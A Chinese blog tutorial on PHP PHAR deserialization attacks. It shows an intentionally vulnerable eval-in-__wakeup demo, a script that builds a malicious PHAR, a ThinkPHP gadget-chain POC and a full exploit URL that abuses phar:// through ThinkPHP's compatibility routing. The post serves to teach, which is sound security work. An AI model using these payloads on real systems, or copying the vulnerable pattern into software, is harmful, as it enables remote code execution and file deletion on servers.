PHAR反序列化漏洞

最新推荐文章于 2024-04-01 21:58:12 发布
最新推荐文章于 2024-04-01 21:58:12 发布
阅读量1k 收藏 3
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kunkun_xiaomeng/article/details/126629323
版权
本文详细介绍了PHAR反序列化漏洞的原理,通过实例展示了如何在不依赖unserialize()的情况下触发该漏洞。首先,阐述了如何利用PHAR伪协议在PHP中读取文件时反序列化元数据信息。接着,通过创建两个PHP文件(phar.php和pharpoc.php)演示了如何构造并执行任意命令。最后,提到了ThinkPHP框架中的PHAR反序列化漏洞,说明了利用条件及非强制路由漏洞,并给出利用POC。整个过程揭示了此类漏洞的危害及利用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

       

一:PHAR反序列化漏洞原理

 我们一般利用反序列化漏洞,一般借助unserialize(),但现在很难利用了,所以考虑用一种新的方法,不需要借助unserialize()情况下触发PHP反序列漏洞。漏洞触发师利用了PHAR://伪协议读取phar文件时,会反序列化meta-data存储的信息。话不多说,看案列。

二:利用PHAR执行任意命令

1.创建phar.php文件

// // 正常的PHP后台执行代码,注意需要使用file_exists函数触发

class User {

   var $name;

    function __wakeup()

    {

        @eval( $this->name);

    }

}

$filename = $_GET['input'];

file_exists($filename);

2.创建pharpoc.php

// 定义生成PHAR文件的过程,并包含一个用户自定义序列化对象

class User{

    var $name;

}

@unlink("test.phar");

$phar = new Phar("test.phar");

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>");

$o = new User();

$o->name = "phpinfo();";

$phar->setMetadata($o);

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

3.访问pharpoc.php 生成test.phar文件

4.使用一下参数访问phar.php

三:thinkPhp中的PHAR反序列化漏洞

  1. 寻找目录

全局搜索file_exists找到

public function check($cacheFile, $cacheTime)

    {

        echo $cacheFile."<br/>";

        // 缓存文件不存在, 直接返回false

        if (!file_exists($cacheFile)) {

            return false;

        }

        if (0 != $cacheTime && time() > filemtime($cacheFile) + $cacheTime) {

            // 缓存是否在有效期

            return false;

        }

        return true;

    }

cacheFile可控

  1. 构建POC

namespace think\process\pipes;

use Phar;

class Pipes {}

class Windows extends Pipes{

    private $files = ['/opt/lampp/htdocs/security/upload/test.php'];

}

@unlink("test.phar");

$phar = new Phar("test.phar");

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>");

$o = new Windows();

$phar->setMetadata($o);

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

执行POC生成test.phar保存在服务器上的任意位置

这时发现没有利用点,需要用到thinkphp中存在的严重漏洞非强制路由漏洞,那么什么是非强制路由漏洞呢?thinkphp为了与考虑早期版本的兼容性,默认保留了兼容模式,只定义了类文件,即使不定义路由规则,也可以直接访问,所以在兼容模式的非强制路由情况下,我们可以直接在不定义路由规则的情况下,直接访问控制器并传参

http://192.168.206.140//tpdemo/public/index.php入口文件。

漏洞产生的条件

  1. 使用兼容模式默认开启
  2. 兼容模式参数名为“s”,默认为s

最后访问传参访问即可

http://192.168.206.140//tpdemo/public/index.phps=index/%5Cthink%5Ctemplate%5Cdriver%5CFile/check&cacheFile=phar:///opt/lampp/htdocs/security/unserial/test.phar/test.txt&cacheTime=100

 

phar反序列化漏洞
Mi1k7ea
01-01 6101
之前做CTF遇到phar反序列化漏洞概念,这里小结一下,主要参考自https://paper.seebug.org/680/ 基本概念 phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本&gt;=5.3时默认开启支持PHAR文件的。 phar文件默认状态是只读,使用phar文件不需要任何的配置。 而phar://伪协议即PHP归档...
第二十三天 phar反序列化漏洞
代码审计
04-01 2272
关于这个方法在2018年 BlackHat 大会上的 Sam Thomas 分享了 File Operation Induced Unserialization via the “phar://” Stream Wrapper ,该研究员指出该方法在 文件系统函数 ( file_get_contents 、 unlink 等)参数可控的情况下,配合 phar://伪协议 ,可以不依赖反序列化函数 unserialize() 直接进行反序列化的操作。 zip rar压缩文件包 类似 默认支持phar协议的使
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHPWeb 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
php反序列化漏洞——phar反序列化漏洞
m0_73756016的博客
04-01 1496
类比java语言JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。文件包含:phar伪协议,可读取 .phar文件。
PHAR 反序列化漏洞
最新发布
03-08
### PHAR反序列化漏洞原理 PHAR是一种PHP存档格式,允许开发者创建自包含的应用程序或库。当处理PHAR文件时,如果应用程序错误地信任并加载了由攻击者控制的PHAR文件,则可能导致反序列化漏洞的发生。 在PHP环境中...
RGCMS2.0存在phar反序列化漏洞
02-22
Phar反序列化漏洞是一种严重的安全风险,在某些情况下允许攻击者执行任意代码。对于RGCMS 2.0而言,该版本可能存在处理用户输入不当的情况,特别是在文件上传或路径操作过程中未能充分验证数据合法性[^1]。 当应用...
[反序列化篇]史上最全PHP反序列化漏洞实例复现姿势详解(补充ing)
qq_43668710的博客
04-15 1722
0x01 实验环境 靶场:pikachu+LKWA 平台:bugku+攻防世界+0CTF+南邮ctf+其他 环境:win10+VPS(ubuntu)+Docker 工具:Burp+MantraPortable (注:若有人需要以上靶场或工具,可以进群自取.群号:456396901) 预备知识 Session反序列化漏洞 phar://协议 phar文件 简单回顾 对上一篇博客做一些补充: 所谓序列...
Phar反序列化漏洞原理
soldi_er的博客
06-08 682
文章目录   来自Secarma的安全研究员Sam Thomas发现,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞。   
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 6309
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
php反序列化漏洞 freebuf,DiscuzX 3.4 Phar反序列化漏洞
weixin_39574869的博客
03-09 329
0x1 前情提要DiscuzX的反序列化比较鸡肋,没有任何可利用的点,只能算一个bug。刚看到一片文章,就是在对phar文件进行操作的时候可以导致反序列化,然后我就对php内置函数进行了测试,发现80%的常用文件操作都能导致触发phar反序列化,我一共测试了如下函数,都可以触发。 下面我就下了discuz的代码看看有没有什么能触发反序列化的点,还真给我找到了。0x2 漏洞分析/source/mo...
php phar 混淆,深入理解PHP Phar反序列化漏洞原理及利用方法(一)
weixin_35749440的博客
03-11 621
Phar反序列化漏洞是一种较新的攻击向量,用于针对面向对象的PHP应用程序执行代码重用攻击,该攻击方式在Black Hat 2018会议上由安全研究员Sam Thomas公开披露。类似于对编译二进制文件的ROP(Return-oriented Programming)攻击,这种类型的漏洞利用PHP对象注入(POI),这是面向对象的PHP代码上下文中的一种面向属性的编程(POP)。由于其新颖性,这种...
Phar反序列化
weixin_63231007的博客
06-06 1714
phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本>=5.3时默认开启支持PHAR文件的。phar文件默认状态是只读,使用phar文件不需要任何的配置。而phar://伪协议即PHP归档,用来解析phar文件内容。生成、使用phar文件php.ini中需要设置 phar.readonly=off 生成特殊的phar文件,使代码运行第六行,打印flag phar文件中的metadata以序列化形式存储,解析phar文件时会进行反序列化操作。
反序列化漏洞 (2)------php 反序列化漏洞 ----- session反序列化问题,phar,pop,绕过__wakeup()
Z_Grant的博客
11-19 1668
文章目录一、漏洞简述php反序列化漏洞又称对象注入二、漏洞利用过程(1) 绕过__wakeup()的限制三、Session反序列化漏洞(1) Session序列化机制PHP处理器的三种序列化方式:配置文件 php.ini 的说明 一、漏洞简述php反序列化漏洞又称对象注入 原理:在php反序列化的时候,反序列化的内容可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函...
浅析phar反序列化漏洞攻击及实战
蚁景网安学院
05-27 603
浅析phar反序列漏洞攻击及实战前言phar反序列化漏洞很久之前就开始接触了;因为当时出了点问题导致一直无法成功,所以当时直接去学习其他的漏洞了;今天觉得是时候把这个漏洞补上去了;漏...
PHP反序列化漏洞,或使 WordPress 遭远程攻击
weixin_34413802的博客
08-21 197
英国安全公司 Secarma 的研究主管 Sam Thomas 本月在 Black Hat 和 BSides 安全会议上展示了 PHP 编程语言安全漏洞,并指出该漏洞影响了所有接受用户...
一个phar://的漏洞
Xi4or0uji
10-17 5933
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不要做小白了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值